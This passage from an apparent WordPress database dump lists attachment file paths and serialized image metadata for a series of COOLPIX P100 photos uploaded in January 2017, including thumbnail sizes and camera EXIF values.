\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3540-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3540-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3540-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3540-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1464225862\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00382555470543\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(998,490,'_wp_attached_file','2017/01/DSCN3565.jpg'),(999,490,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2017/01/DSCN3565.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3565-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3565-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3565-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3565-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3565-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3565-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3565-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3565-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3565-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3565-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3565-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3565-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1464843824\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00445037828215\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1000,491,'_wp_attached_file','2017/01/DSCN3712.jpg'),(1001,491,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2017/01/DSCN3712.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3712-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3712-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3712-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3712-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3712-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3712-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3712-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3712-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3712-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3712-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3712-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3712-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1468741998\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"120\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00416666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1002,492,'_wp_attached_file','2017/01/DSCN3679.jpg'),(1003,492,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2017/01/DSCN3679.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3679-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3679-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3679-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3679-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3679-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3679-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3679-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3679-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3679-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3679-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3679-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3679-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1467606153\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"10.3\";s:3:\"iso\";s:3:\"258\";s:13:\"shutter_speed\";s:15:\"0.0333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1004,493,'_wp_attached_file','2017/01/DSCN3598.jpg'),(1005,493,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2017/01/DSCN3598.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3598-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3598-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3598-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3598-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3598-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3598-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3598-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3598-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3598-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3598-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3598-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3598-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1465878395\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00641848523748\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1006,494,'_wp_attached_file','2017/01/DSCN3711.jpg'),(1007,494,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2017/01/DSCN3711.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3711-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3711-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3711-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3711-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3711-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3711-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3711-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3711-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3711-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3711-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3711-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3711-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1468741987\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"120\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00348918353105\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1008,495,'_wp_attached_file','2017/01/DSCN3810.jpg'),(1009,495,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3810.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3810-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3810-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3810-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3810-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3810-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3810-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3810-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3810-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3810-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3810-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3810-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3810-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1471685219\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00777604976672\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1010,496,'_wp_attached_file','2017/01/DSCN3819.jpg'),(1011,496,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3819.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3819-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3819-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3819-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3819-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3819-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3819-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3819-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3819-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3819-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3819-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3819-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3819-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1472026489\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"120\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00555555555556\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1012,497,'_wp_attached_file','2017/01/DSCN3841.jpg'),(1013,497,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3841.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3841-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3841-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3841-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3841-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3841-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3841-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3841-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3841-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3841-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3841-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3841-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3841-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1472674439\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"51.8\";s:3:\"iso\";s:3:\"164\";s:13:\"shutter_speed\";s:15:\"0.0333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1014,498,'_wp_attached_file','2017/01/DSCN3982.jpg'),(1015,498,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3982.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3982-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3982-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3982-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3982-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3982-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3982-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3982-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3982-1080x380.jpg\";s: